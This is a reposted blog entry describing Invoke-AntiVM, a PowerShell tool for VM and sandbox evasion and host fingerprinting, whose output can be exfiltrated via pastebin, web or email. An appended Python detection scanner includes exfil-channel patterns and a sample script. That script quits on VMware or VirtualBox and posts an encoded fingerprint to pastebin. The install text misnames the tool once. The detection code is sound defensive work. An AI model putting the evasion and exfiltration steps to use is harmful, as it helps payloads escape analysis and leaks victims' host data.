Invoke-Antivm - Powershell Tool For VM Evasion
2020-11-21 05:30:00 Author: www.blogger.com (view original)

Invoke-AntiVM is a set of modules to perform VM detection and fingerprinting (with exfiltration) via PowerShell.

Compatibility

Run the script check-compatibility.ps1 to check which modules or functions are compatible with your PowerShell version. Our goal is to achieve compatibility from 2.0, but we are not there yet. Please run check-compatibility.ps1 to see the current compatibility issues.

Background

We wrote this tool to unify several techniques to identify VM or sandbox technologies. It relies on both signature-based and behavioural signals to decide whether a host is a VM or not. The modules are categorized into logical groups: CPU, Execution, Network, Programs. The user can also decide to exfiltrate a fingerprint of the target host in order to determine which features can be used to identify a sandbox or VM solution.

Purpose

Invoke-AntiVM was developed to understand the implications of using obfuscation and anti-VM tricks in PowerShell payloads. We hope this will help Red Teams to avoid analysis of their payload and Blue Teams to understand how to deobfuscate a script with evasion techniques. You can either use the main module file Invoke-AntiVM.psd1 or the individual ps1 script files if you want to reduce the size.

Usage

Usage examples are provided in the following scripts:

- detect.ps1: an example script showing how to call the different tests
- usage.ps1: basic usage
- usage_more.ps1: more advanced functions
- usage_exfil.ps1: how to exfiltrate host information as a JSON document via pastebin, web or email
- usage_fingerprint_file.ps1: the exfiltration module and the data it generates in the form of a JSON document
- poc_fingerprint_combined.ps1: the fingerprinting module used against online sandboxes
- output/poc.docm: an example MS Word attack with a macro that calls the fingerprinting module (uploaded previously to a server)

The folder pastebin contains the following scripts:

- full_fingerprints.py, which downloads all the pastes
- decode_pastebins.ps1, which decompresses and decodes the fingerprint documents

You have to make sure you use the same encryption key you used during the exfiltration step. The folder package shows how to package all the scripts into a single file for better portability. The folder pastebin shows how to automatically pull and decode the exfiltrated documents from pastebin.

Installation

The source code for Invoke-CradleCrafter is hosted at Github, and you may download, fork and review it from this repository (https://github.com/robomotic/invoke-antivm). Please report issues or feature requests through Github's bug tracker associated with this project.

To install: run the script install_module.ps1

Download Invoke-Antivm: https://github.com/robomotic/invoke-antivm

Zion3R
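As an added example from the Blue Team side of the Purpose section (not code from the Invoke-AntiVM project), the following Python triage scanner flags, in a PowerShell script, the hardware-probing groups the post names (CPU, Execution, Network, Programs), VM vendor strings, JSON fingerprint serialization and the pastebin/web/email exfil channels, and returns a verdict. The indicator regexes and the sample script are assumptions constructed for this example, not the tool's own signatures.

```python
import re
from collections import defaultdict

# Indicator groups follow the post's module groups (CPU, Execution, Network, Programs)
# plus the fingerprint serialization and the exfil channels it names (pastebin, web,
# email). The regexes are this example's own assumptions, not the tool's signatures.
INDICATORS = {
    "cpu": [r"Win32_Processor", r"NumberOfCores", r"NumberOfLogicalProcessors"],
    "execution": [r"Win32_ComputerSystem", r"Win32_BIOS", r"Get-Process\b"],
    "network": [r"Win32_NetworkAdapter", r"Get-NetAdapter", r"MACAddress"],
    "programs": [r"Win32_Product", r"Uninstall\\"],
    "vm_vendor": [r"VMware", r"VirtualBox|VBox", r"QEMU", r"Hyper-V", r"innotek"],
    "fingerprint": [r"ConvertTo-Json", r"ToBase64String", r"GZipStream|DeflateStream"],
    "exfil": [r"pastebin\.com", r"Invoke-WebRequest", r"Invoke-RestMethod", r"Send-MailMessage"],
}

def scan_script(text):
    """Return {group: [(line_no, matched_text), ...]} for every indicator that fires."""
    hits = defaultdict(list)
    for line_no, line in enumerate(text.splitlines(), start=1):
        for group, patterns in INDICATORS.items():
            for pat in patterns:
                m = re.search(pat, line, re.IGNORECASE)
                if m:
                    hits[group].append((line_no, m.group(0)))
    return dict(hits)

def assess(hits):
    """Triage verdict: what the script probes, and whether the result leaves the host."""
    probes = [g for g in ("cpu", "execution", "network", "programs", "vm_vendor") if g in hits]
    if not probes:
        return "no anti-vm indicators"
    if "exfil" in hits:
        return "fingerprint-with-exfil"
    if "vm_vendor" in hits:
        return "vm-detection-only"
    return "host-probing"

# Constructed sample in the shape the post describes (hardware probe, JSON fingerprint,
# pastebin upload); it is not code from the project.
SAMPLE_SCRIPT = r'''
$cs  = Get-WmiObject Win32_ComputerSystem
$cpu = Get-WmiObject Win32_Processor
if ($cs.Manufacturer -match "VMware|VirtualBox") { exit }
$fp = @{ Model = $cs.Model; Cores = $cpu.NumberOfCores } | ConvertTo-Json
$blob = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($fp))
Invoke-RestMethod -Uri "https://pastebin.com/api/" -Method Post -Body @{ paste = $blob }
'''.strip()
```

Running `assess(scan_script(SAMPLE_SCRIPT))` on the constructed sample yields "fingerprint-with-exfil"; a script that only queries hardware without sending anything is reported as "host-probing".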

Article source: http://www.blogger.com/feeds/8317222231133660547/posts/default/6281885634456257031